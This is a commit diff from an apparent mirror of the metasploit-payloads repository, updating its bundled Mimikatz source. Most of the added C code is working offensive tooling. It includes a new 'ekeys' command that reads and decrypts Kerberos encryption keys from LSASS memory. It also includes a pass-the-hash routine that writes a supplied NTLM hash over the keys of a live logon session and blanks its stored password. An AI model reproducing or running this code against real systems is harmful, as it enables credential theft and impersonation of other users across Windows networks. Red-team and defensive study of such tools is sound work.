mirror of
https://github.com/rapid7/metasploit-payloads
synced 2025-01-20 20:37:27 +01:00
Update to Mimikatz commit 5571133a4bc4a9a690cbdcab5f7db6f8ff8bc7e3
This commit is contained in:
OJ
parent
940c94e946
commit
e7974b4707
@ -213,7 +213,7 @@ NTSTATUS kuhl_m_crypto_l_certificates(int argc, wchar_t * argv[])
|
||||
kull_m_string_args_byName(argc, argv, L"store", &szStore, L"My");
|
||||
|
||||
kprintf(L" * System Store : \'%s\' (0x%08x)\n"
|
||||
L" * Store : \'%s\'\n",
|
||||
L" * Store : \'%s\'\n\n",
|
||||
szSystemStore, dwSystemStore,
|
||||
szStore);
|
||||
|
||||
@ -230,7 +230,7 @@ NTSTATUS kuhl_m_crypto_l_certificates(int argc, wchar_t * argv[])
|
||||
{
|
||||
if(CertGetNameString(pCertContext, nameSrc[j], 0, NULL, certName, dwSizeNeeded) == dwSizeNeeded)
|
||||
{
|
||||
kprintf(L"\n%2u. %s\n", i, certName);
|
||||
kprintf(L"%2u. %s\n", i, certName);
|
||||
|
||||
dwSizeNeeded = 0;
|
||||
if(CertGetCertificateContextProperty(pCertContext, CERT_KEY_PROV_INFO_PROP_ID, NULL, &dwSizeNeeded))
|
||||
@ -273,6 +273,8 @@ NTSTATUS kuhl_m_crypto_l_certificates(int argc, wchar_t * argv[])
|
||||
} else PRINT_ERROR_AUTO(L"CertGetCertificateContextProperty");
|
||||
}
|
||||
LocalFree(pBuffer);
|
||||
if(!export)
|
||||
kprintf(L"\n");
|
||||
}
|
||||
|
||||
if(export)
|
||||
@ -554,6 +556,7 @@ void kuhl_m_crypto_exportCert(PCCERT_CONTEXT pCertificate, BOOL havePrivateKey,
|
||||
else
|
||||
PRINT_ERROR_AUTO(L"kuhl_m_crypto_generateFileName");
|
||||
}
|
||||
kprintf(L"\n");
|
||||
}
|
||||
|
||||
wchar_t * kuhl_m_crypto_generateFileName(const wchar_t * term0, const wchar_t * term1, const DWORD index, const wchar_t * name, const wchar_t * ext)
|
||||
|
||||
@ -21,6 +21,7 @@ const KUHL_M_C kuhl_m_c_sekurlsa[] = {
|
||||
|
||||
{kuhl_m_sekurlsa_msv_pth, L"pth", L"Pass-the-hash"},
|
||||
{kuhl_m_sekurlsa_kerberos_tickets, L"tickets", L"List Kerberos tickets"},
|
||||
{kuhl_m_sekurlsa_kerberos_keys, L"ekeys", L"List Kerberos Encryption Keys"},
|
||||
{kuhl_m_sekurlsa_dpapi, L"dpapi", L"List Cached MasterKeys"},
|
||||
{kuhl_m_sekurlsa_credman, L"credman", L"List Credentials Manager"},
|
||||
};
|
||||
@ -446,6 +447,8 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
|
||||
PUNICODE_STRING credentials, username = NULL, domain = NULL, password = NULL;
|
||||
PMSV1_0_PRIMARY_CREDENTIAL pPrimaryCreds;
|
||||
PRPCE_CREDENTIAL_KEYCREDENTIAL pRpceCredentialKeyCreds;
|
||||
PKERB_HASHPASSWORD_GENERIC pHashPassword;
|
||||
UNICODE_STRING buffer;
|
||||
PVOID base;
|
||||
DWORD type, i;
|
||||
|
||||
@ -503,6 +506,21 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
|
||||
}
|
||||
}
|
||||
}
|
||||
else if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST)
|
||||
{
|
||||
pHashPassword = (PKERB_HASHPASSWORD_GENERIC) mesCreds;
|
||||
kprintf(L"\t %4i : ", pHashPassword->Type);
|
||||
buffer.Buffer = (PWSTR) pHashPassword->Checksump;
|
||||
buffer.Length = buffer.MaximumLength = (USHORT) ((pHashPassword->Size) ? pHashPassword->Size : LM_NTLM_HASH_LENGTH); // will not use CDLocateCSystem, sorry!
|
||||
if(kull_m_string_getUnicodeString(&buffer, cLsass.hLsassMem))
|
||||
{
|
||||
if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
|
||||
(*lsassLocalHelper->pLsaUnprotectMemory)(buffer.Buffer, buffer.MaximumLength);
|
||||
kull_m_string_wprintf_hex(buffer.Buffer, buffer.Length, 0);
|
||||
LocalFree(buffer.Buffer);
|
||||
}
|
||||
kprintf(L"\n");
|
||||
}
|
||||
else
|
||||
{
|
||||
if(mesCreds->UserName.Buffer || mesCreds->Domaine.Buffer || mesCreds->Password.Buffer)
|
||||
|
||||
@ -37,6 +37,7 @@
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY 0x02000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK 0x07000000
|
||||
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST 0x00200000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDMANPASS 0x00400000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE 0x00800000
|
||||
|
||||
|
||||
@ -55,6 +55,10 @@ const KERB_INFOS kerbHelper[] = {
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_51, Ticket),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_51, TicketKvno),
|
||||
sizeof(KIWI_KERBEROS_INTERNAL_TICKET_51),
|
||||
sizeof(LIST_ENTRY) + FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_51, pKeyList),
|
||||
sizeof(KIWI_KERBEROS_KEYS_LIST_5),
|
||||
FIELD_OFFSET(KERB_HASHPASSWORD_5, generic),
|
||||
sizeof(KERB_HASHPASSWORD_5),
|
||||
},
|
||||
{
|
||||
sizeof(LIST_ENTRY) + FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
|
||||
@ -83,6 +87,10 @@ const KERB_INFOS kerbHelper[] = {
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_52, Ticket),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_52, TicketKvno),
|
||||
sizeof(KIWI_KERBEROS_INTERNAL_TICKET_52),
|
||||
sizeof(LIST_ENTRY) + FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_51, pKeyList),
|
||||
sizeof(KIWI_KERBEROS_KEYS_LIST_5),
|
||||
FIELD_OFFSET(KERB_HASHPASSWORD_5, generic),
|
||||
sizeof(KERB_HASHPASSWORD_5),
|
||||
},
|
||||
{
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
|
||||
@ -111,6 +119,10 @@ const KERB_INFOS kerbHelper[] = {
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, Ticket),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, TicketKvno),
|
||||
sizeof(KIWI_KERBEROS_INTERNAL_TICKET_6),
|
||||
sizeof(LIST_ENTRY) + FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_51, pKeyList),
|
||||
sizeof(KIWI_KERBEROS_KEYS_LIST_6),
|
||||
FIELD_OFFSET(KERB_HASHPASSWORD_6, generic),
|
||||
sizeof(KERB_HASHPASSWORD_6),
|
||||
},
|
||||
};
|
||||
|
||||
@ -129,29 +141,156 @@ LONG kuhl_m_sekurlsa_kerberos_enum(PKUHL_M_SEKURLSA_EXTERNAL callback, LPVOID st
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData)
|
||||
{
|
||||
kuhl_m_sekurlsa_enum_generic_callback_kerberos(pData, NULL);
|
||||
KIWI_KERBEROS_ENUM_DATA data = {kuhl_m_sekurlsa_enum_kerberos_callback_passwords, NULL};
|
||||
kuhl_m_sekurlsa_enum_generic_callback_kerberos(pData, &data);
|
||||
}
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_kerberos_tickets(int argc, wchar_t * argv[])
|
||||
{
|
||||
kuhl_m_sekurlsa_enum(kuhl_m_sekurlsa_enum_callback_kerberos_tickets, &argc);
|
||||
KIWI_KERBEROS_ENUM_DATA_TICKET ticketData = {argc, FALSE};
|
||||
KIWI_KERBEROS_ENUM_DATA data = {kuhl_m_sekurlsa_enum_kerberos_callback_tickets, &ticketData};
|
||||
kuhl_m_sekurlsa_enum(kuhl_m_sekurlsa_enum_callback_kerberos_generic, &data);
|
||||
return STATUS_SUCCESS;
|
||||
}
|
||||
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_kerberos_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData)
|
||||
NTSTATUS kuhl_m_sekurlsa_kerberos_keys(int argc, wchar_t * argv[])
|
||||
{
|
||||
kuhl_m_sekurlsa_enum_generic_callback_kerberos(pData, pOptionalData);
|
||||
KIWI_KERBEROS_ENUM_DATA data = {kuhl_m_sekurlsa_enum_kerberos_callback_keys, NULL};
|
||||
kuhl_m_sekurlsa_enum(kuhl_m_sekurlsa_enum_callback_kerberos_generic, &data);
|
||||
return STATUS_SUCCESS;
|
||||
}
|
||||
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_kerberos_generic(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData)
|
||||
{
|
||||
kuhl_m_sekurlsa_enum_generic_callback_kerberos(pData, (PKIWI_KERBEROS_ENUM_DATA) pOptionalData);
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_passwords(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS LocalKerbSession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData)
|
||||
{
|
||||
UNICODE_STRING pinCode;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = { KULL_M_MEMORY_TYPE_OWN, NULL };
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = { &pinCode, &hLocalMemory }, aLsassMemory = { *(PUNICODE_STRING *)((PBYTE)LocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetPin), pData->cLsass->hLsassMem };
|
||||
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL)((PBYTE)LocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetCreds), pData->LogonId, 0, NULL, NULL);
|
||||
if (aLsassMemory.address)
|
||||
if (kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(UNICODE_STRING)))
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL)&pinCode, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE | ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_VISTA) ? KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT : 0), NULL, NULL);
|
||||
}
|
||||
|
||||
const wchar_t * KUHL_M_SEKURLSA_KERBEROS_TICKET_TYPE[] = {L"Ticket Granting Service", L"Client Ticket ?", L"Ticket Granting Ticket",};
|
||||
void kuhl_m_sekurlsa_enum_generic_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData)
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS Localkerbsession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData)
|
||||
{
|
||||
PKIWI_KERBEROS_ENUM_DATA_TICKET ticketData = (PKIWI_KERBEROS_ENUM_DATA_TICKET)pOptionalData;
|
||||
DWORD i;
|
||||
kuhl_m_sekurlsa_printinfos_logonData(pData);
|
||||
for (i = 0; i < 3; i++)
|
||||
{
|
||||
kprintf(L"\n\tGroup %u - %s", i, KUHL_M_SEKURLSA_KERBEROS_TICKET_TYPE[i]);
|
||||
kuhl_m_sekurlsa_kerberos_enum_tickets(pData, i, (PBYTE)RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetTickets[i], ticketData->isTicketExport);
|
||||
kprintf(L"\n");
|
||||
}
|
||||
}
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_keys(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS Localkerbsession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData)
|
||||
{
|
||||
DWORD i, nbHash;
|
||||
KULL_M_MEMORY_ADDRESS aLocalKeyMemory = { NULL, Localkerbsession.hMemory }, aLocalHashMemory = { NULL, Localkerbsession.hMemory };
|
||||
if (RemoteLocalKerbSession.address = *(PVOID *)((PBYTE)Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetKeyList))
|
||||
{
|
||||
kuhl_m_sekurlsa_printinfos_logonData(pData);
|
||||
kprintf(L"\n\tKey List @ %p\n", RemoteLocalKerbSession.address);
|
||||
if (aLocalKeyMemory.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structKeyListSize))
|
||||
{
|
||||
if (kull_m_memory_copy(&aLocalKeyMemory, &RemoteLocalKerbSession, kerbHelper[KerbOffsetIndex].structKeyListSize))
|
||||
{
|
||||
if (nbHash = ((DWORD *)(aLocalKeyMemory.address))[1])
|
||||
{
|
||||
RemoteLocalKerbSession.address = (PBYTE)RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].structKeyListSize;
|
||||
i = nbHash * (DWORD)kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize;
|
||||
if (aLocalHashMemory.address = LocalAlloc(LPTR, i))
|
||||
{
|
||||
if (kull_m_memory_copy(&aLocalHashMemory, &RemoteLocalKerbSession, i))
|
||||
for (i = 0; i < nbHash; i++)
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL)((PBYTE)aLocalHashMemory.address + i * kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize + kerbHelper[KerbOffsetIndex].offsetHashGeneric), pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST | ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_VISTA) ? KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT : 0), NULL, NULL);
|
||||
LocalFree(aLocalHashMemory.address);
|
||||
}
|
||||
}
|
||||
}
|
||||
LocalFree(aLocalKeyMemory.address);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_pth(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS Localkerbsession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData)
|
||||
{
|
||||
PMSV1_0_PTH_DATA pthData = (PMSV1_0_PTH_DATA)pOptionalData;
|
||||
DWORD i, nbHash;
|
||||
BYTE ntlmHash[LM_NTLM_HASH_LENGTH];
|
||||
UNICODE_STRING nullPasswd = { 0, 0, NULL };
|
||||
KULL_M_MEMORY_ADDRESS aLocalKeyMemory = { NULL, Localkerbsession.hMemory }, aLocalHashMemory = { NULL, Localkerbsession.hMemory }, aLocalNTLMMemory = { ntlmHash, Localkerbsession.hMemory }, aLocalPasswdMemory = { &nullPasswd, Localkerbsession.hMemory }, aRemotePasswdMemory = { (PBYTE)RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetCreds + FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password), RemoteLocalKerbSession.hMemory };
|
||||
PKERB_HASHPASSWORD_GENERIC pHash;
|
||||
|
||||
if (RemoteLocalKerbSession.address = *(PVOID *)((PBYTE)Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetKeyList))
|
||||
{
|
||||
if (aLocalKeyMemory.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structKeyListSize))
|
||||
{
|
||||
if (kull_m_memory_copy(&aLocalKeyMemory, &RemoteLocalKerbSession, kerbHelper[KerbOffsetIndex].structKeyListSize))
|
||||
{
|
||||
if (nbHash = ((DWORD *)(aLocalKeyMemory.address))[1])
|
||||
{
|
||||
RemoteLocalKerbSession.address = (PBYTE)RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].structKeyListSize;
|
||||
i = nbHash * (DWORD)kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize;
|
||||
if (aLocalHashMemory.address = LocalAlloc(LPTR, i))
|
||||
{
|
||||
if (kull_m_memory_copy(&aLocalHashMemory, &RemoteLocalKerbSession, i))
|
||||
{
|
||||
kprintf(L"Data copy Kerberos @ %p (%u hash) :", RemoteLocalKerbSession.address, nbHash);
|
||||
for (i = 0, pthData->isReplaceOk = TRUE; (i < nbHash) && pthData->isReplaceOk; i++)
|
||||
{
|
||||
kprintf(L" ");
|
||||
pHash = (PKERB_HASHPASSWORD_GENERIC)((PBYTE)aLocalHashMemory.address + i * kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize + kerbHelper[KerbOffsetIndex].offsetHashGeneric);
|
||||
RemoteLocalKerbSession.address = pHash->Checksump;
|
||||
RtlCopyMemory(aLocalNTLMMemory.address, pthData->NtlmHash, LM_NTLM_HASH_LENGTH);
|
||||
if (pData->cLsass->osContext.BuildNumber >= KULL_M_WIN_BUILD_VISTA)
|
||||
(*pData->lsassLocalHelper->pLsaProtectMemory)(aLocalNTLMMemory.address, LM_NTLM_HASH_LENGTH);
|
||||
if (pthData->isReplaceOk = kull_m_memory_copy(&RemoteLocalKerbSession, &aLocalNTLMMemory, pHash->Size ? (min(pHash->Size, LM_NTLM_HASH_LENGTH)) : LM_NTLM_HASH_LENGTH)) // ok not fair-play with AES-* and old CRC =)
|
||||
kprintf(L"%u", i + 1);
|
||||
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
|
||||
}
|
||||
if (pthData->isReplaceOk && ((PKIWI_GENERIC_PRIMARY_CREDENTIAL)((PBYTE)Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetCreds))->Password.Buffer)
|
||||
{
|
||||
kprintf(L" ");
|
||||
if (pthData->isReplaceOk = kull_m_memory_copy(&aRemotePasswdMemory, &aLocalPasswdMemory, sizeof(UNICODE_STRING)))
|
||||
kprintf(L"OK!", aRemotePasswdMemory.address);
|
||||
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
|
||||
}
|
||||
}
|
||||
LocalFree(aLocalHashMemory.address);
|
||||
}
|
||||
}
|
||||
}
|
||||
LocalFree(aLocalKeyMemory.address);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_kerberos_pth(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData)
|
||||
{
|
||||
PMSV1_0_PTH_DATA pthData = (PMSV1_0_PTH_DATA)pOptionalData;
|
||||
KIWI_KERBEROS_ENUM_DATA data = { kuhl_m_sekurlsa_enum_kerberos_callback_pth, pthData };
|
||||
if (RtlEqualLuid(pData->LogonId, pthData->LogonId))
|
||||
{
|
||||
kuhl_m_sekurlsa_enum_generic_callback_kerberos(pData, &data);
|
||||
return FALSE;
|
||||
}
|
||||
else return TRUE;
|
||||
}
|
||||
|
||||
void kuhl_m_sekurlsa_enum_generic_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKIWI_KERBEROS_ENUM_DATA pEnumData)
|
||||
{
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = { KULL_M_MEMORY_TYPE_OWN, NULL };
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = { NULL, &hLocalMemory }, aLsassMemory = { NULL, pData->cLsass->hLsassMem };
|
||||
UNICODE_STRING pinCode;
|
||||
DWORD i;
|
||||
|
||||
if (kuhl_m_sekurlsa_kerberos_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_kerberos_package.Module, KerberosReferences, sizeof(KerberosReferences) / sizeof(KULL_M_PATCH_GENERIC), &KerbLogonSessionListOrTable, NULL, &KerbOffsetIndex))
|
||||
{
|
||||
aLsassMemory.address = KerbLogonSessionListOrTable;
|
||||
@ -165,29 +304,7 @@ void kuhl_m_sekurlsa_enum_generic_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGO
|
||||
if (aLocalMemory.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structSize))
|
||||
{
|
||||
if (kull_m_memory_copy(&aLocalMemory, &aLsassMemory, kerbHelper[KerbOffsetIndex].structSize))
|
||||
{
|
||||
if (pOptionalData) // ticket mode
|
||||
{
|
||||
kuhl_m_sekurlsa_printinfos_logonData(pData);
|
||||
|
||||
for (i = 0; i < 3; i++)
|
||||
{
|
||||
kprintf(L"\n\tGroup %u - %s", i, KUHL_M_SEKURLSA_KERBEROS_TICKET_TYPE[i]);
|
||||
kuhl_m_sekurlsa_kerberos_enum_tickets(pData, i, (PBYTE)aLsassMemory.address + kerbHelper[KerbOffsetIndex].offsetTickets[i], *(int *)pOptionalData);
|
||||
kprintf(L"\n");
|
||||
}
|
||||
}
|
||||
else // password mode
|
||||
{
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL)((PBYTE)aLocalMemory.address + kerbHelper[KerbOffsetIndex].offsetCreds), pData->LogonId, 0, NULL, NULL);
|
||||
if (aLsassMemory.address = (*(PUNICODE_STRING *)((PBYTE)aLocalMemory.address + kerbHelper[KerbOffsetIndex].offsetPin)))
|
||||
{
|
||||
aLocalMemory.address = &pinCode;
|
||||
if (kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(UNICODE_STRING)))
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL)&pinCode, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE | ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_VISTA) ? KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT : 0), NULL, NULL);
|
||||
}
|
||||
}
|
||||
}
|
||||
pEnumData->callback(pData, aLocalMemory, aLsassMemory, pEnumData->optionalData);
|
||||
LocalFree(aLocalMemory.address);
|
||||
}
|
||||
}
|
||||
|
||||
@ -6,18 +6,37 @@
|
||||
#pragma once
|
||||
#include "../kuhl_m_sekurlsa.h"
|
||||
#include "../../kerberos/khul_m_kerberos_ticket.h"
|
||||
#include "../modules/kull_m_crypto_system.h"
|
||||
#include "../modules/kull_m_file.h"
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_kerberos_package;
|
||||
|
||||
typedef void (CALLBACK * PKUHL_M_SEKURLSA_KERBEROS_CRED_CALLBACK) (IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS LocalKerbSession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData);
|
||||
|
||||
typedef struct _KIWI_KERBEROS_ENUM_DATA {
|
||||
PKUHL_M_SEKURLSA_KERBEROS_CRED_CALLBACK callback;
|
||||
PVOID optionalData;
|
||||
} KIWI_KERBEROS_ENUM_DATA, *PKIWI_KERBEROS_ENUM_DATA;
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_kerberos(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_sekurlsa_kerberos_tickets(int argc, wchar_t * argv[]);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData);
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_kerberos_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData);
|
||||
NTSTATUS kuhl_m_sekurlsa_kerberos_keys(int argc, wchar_t * argv[]);
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData);
|
||||
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_kerberos_generic(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData);
|
||||
void kuhl_m_sekurlsa_enum_generic_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKIWI_KERBEROS_ENUM_DATA pEnumData);
|
||||
|
||||
void kuhl_m_sekurlsa_enum_generic_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData);
|
||||
void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN DWORD grp, IN PVOID tickets, IN BOOL isFile);
|
||||
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_passwords(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS LocalKerbSession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS LocalKerbSession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_keys(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS LocalKerbSession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData);
|
||||
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_kerberos_pth(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_pth(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS Localkerbsession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData);
|
||||
|
||||
wchar_t * kuhl_m_sekurlsa_kerberos_generateFileName(PLUID LogonId, const DWORD grp, const DWORD index, PKIWI_KERBEROS_TICKET ticket, LPCWSTR ext);
|
||||
|
||||
PKIWI_KERBEROS_TICKET kuhl_m_sekurlsa_kerberos_createTicket(PBYTE pTicket, PKULL_M_MEMORY_HANDLE hLSASS);
|
||||
@ -52,6 +71,10 @@ typedef struct _KERB_INFOS
|
||||
LONG offsetTicket;
|
||||
LONG offsetTicketKvno;
|
||||
SIZE_T structTicketSize;
|
||||
LONG offsetKeyList;
|
||||
SIZE_T structKeyListSize;
|
||||
LONG offsetHashGeneric;
|
||||
SIZE_T structKeyPasswordHashSize;
|
||||
} KERB_INFOS, *PKERB_INFOS;
|
||||
|
||||
typedef struct _KIWI_KERBEROS_LOGON_SESSION_51
|
||||
@ -85,7 +108,7 @@ typedef struct _KIWI_KERBEROS_LOGON_SESSION_51
|
||||
PVOID unk20;
|
||||
PVOID unk21;
|
||||
PVOID unk22;
|
||||
PVOID unk23;
|
||||
PVOID pKeyList;
|
||||
PVOID unk24;
|
||||
LIST_ENTRY Tickets_1;
|
||||
LIST_ENTRY Tickets_2;
|
||||
@ -124,7 +147,7 @@ typedef struct _KIWI_KERBEROS_LOGON_SESSION
|
||||
PVOID unk20;
|
||||
PVOID unk21;
|
||||
PVOID unk22;
|
||||
PVOID unk23;
|
||||
PVOID pKeyList;
|
||||
LIST_ENTRY Tickets_1;
|
||||
FILETIME unk24;
|
||||
LIST_ENTRY Tickets_2;
|
||||
@ -235,3 +258,26 @@ typedef struct _KIWI_KERBEROS_INTERNAL_TICKET_6 {
|
||||
ULONG TicketKvno;
|
||||
KIWI_KERBEROS_BUFFER Ticket;
|
||||
} KIWI_KERBEROS_INTERNAL_TICKET_6, *PKIWI_KERBEROS_INTERNAL_TICKET_6;
|
||||
|
||||
typedef struct _KIWI_KERBEROS_KEYS_LIST_5 {
|
||||
DWORD unk0; // dword_1233EC8 dd 4
|
||||
DWORD cbItem; // debug048:01233ECC dd 5
|
||||
PVOID unk1;
|
||||
PVOID unk2;
|
||||
//KERB_HASHPASSWORD_5 KeysEntries[ANYSIZE_ARRAY];
|
||||
} KIWI_KERBEROS_KEYS_LIST_5, *PKIWI_KERBEROS_KEYS_LIST_5;
|
||||
|
||||
